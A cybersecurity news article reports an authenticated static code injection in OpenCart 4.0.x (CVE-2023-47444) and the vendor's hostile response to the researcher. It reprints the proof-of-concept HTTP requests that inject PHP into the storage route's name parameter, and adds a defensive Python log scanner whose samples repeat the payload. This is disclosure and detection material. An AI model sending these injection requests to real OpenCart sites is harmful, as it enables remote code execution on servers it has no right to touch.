Researcher Discloses OpenCart Vulnerability; Company Reacts Aggressively
A security researcher who goes by the name "0xbro" discovered a static code injection vulnerability in OpenCart that allows arbitrary untrusted data to be written into the config.php and admin/config.php files, which can lead to remote code execution.
The vulnerability was assigned CVE-2023-47444 with a severity score of 8.8 (High).
However, the security researcher's responsible disclosure to OpenCart was not met with a polite answer. The administrator, who goes by the name Daniel Kerr, replied to the report saying, "ur a f**kng tim.e waster".
CVE-2023-47444: Authenticated Static Code Injections in OpenCart
This vulnerability exists in OpenCart versions 4.0.0.0 to 4.0.2.3 and allows an authenticated user with common/security "access" and "modify" privileges to write untrusted arbitrary data to config.php and admin/config.php, which can lead to remote code execution.
The vulnerability exists in two functions: one that moves the storage folder outside the application web root, and another that renames the main admin path after installation.
Prerequisites and Proof of Concept
To exploit this vulnerability, the threat actor must have valid credentials for the backend dashboard along with write permission on common/security. In addition, the admin/ folder must be the default one and must not have been renamed.
According to the proof of concept for this vulnerability, the requests have to be sent in two steps.
- route=common/security.storage&name=pwned');phpinfo();%23&path=&user_token=
- route=common/security.storage&name=pwned');phpinfo();%23&path=&user_token=&page=99
First Request
GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

— RESPONSE —

HTTP/1.1 200 OK
{"next":"http://127.0.0.1:8888/admin_secret/index.php?route=common/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned');phpinfo();#&path=/home/kali/Projects/OpenCart/4.0.2.3/&page=2"}
Second Request
GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

— RESPONSE —

HTTP/1.1 200 OK
{"success":"Success: Storage directory has been moved!"}
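As an added example that is not part of the article or of the researcher's report, the following Python scans Apache-style access-log lines (constructed here to mirror the proof-of-concept requests above) for calls to the two config-rewriting routes whose name or path parameter contains characters that could close a quoted PHP string. The route and parameter names come from the requests shown above; the log format, the safe-character set and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# OpenCart 4.0.x admin routes that rewrite config.php / admin/config.php
WATCHED_ROUTES = {"common/security.storage", "common/security.admin"}

# A folder name or filesystem path made only of these characters cannot
# close a quoted PHP string; anything else (quote, ')', ';', '#') is flagged.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_./-]*$")

# Apache combined-format request field (assumed): "GET /target HTTP/1.1" status
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log: line 1 mirrors the first PoC request above,
# line 2 is a legitimate storage rename, line 3 is an unrelated admin page.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Nov/2023:10:00:01 +0000] "GET /admin_secret/index.php'
    "?route=common/security.storage&name=pwned');phpinfo();%23"
    '&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1" 200 215',
    '127.0.0.1 - - [10/Nov/2023:10:05:42 +0000] "GET /admin_secret/index.php'
    '?route=common/security.storage&name=storage_2023&path=/var/www/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1" 200 96',
    '127.0.0.1 - - [10/Nov/2023:10:06:00 +0000] "GET /admin_secret/index.php'
    '?route=common/dashboard&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1" 200 5120',
]


def suspicious_params(target: str) -> dict:
    """Return {param: decoded value} for unsafe name/path values sent to a
    watched route, or an empty dict when the request looks benign."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("route", [""])[0] not in WATCHED_ROUTES:
        return {}
    hits = {}
    for key in ("name", "path"):
        for value in query.get(key, []):
            if not SAFE_VALUE.match(value):
                hits[key] = value
    return hits


def scan_log(lines) -> list:
    """Return (line_no, status, hits) for every request worth investigating;
    a 200 on such a request means the config rewrite most likely succeeded."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if match:
            hits = suspicious_params(match.group("target"))
            if hits:
                findings.append((line_no, match.group("status"), hits))
    return findings
```

Because the second PoC request only repeats the first with &page=99, both steps are caught by the same rule, and a legitimate rename that keeps to plain folder names is not flagged.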
In addition to that response from OpenCart, the administrators also closed the pull request on GitHub, labelling it a "non-vulnerability". However, the fix was later merged into master.
A full report on this vulnerability and OpenCart's response has been published, providing detailed information on the proof of concept and other findings.
Source credit: cybersecuritynews.com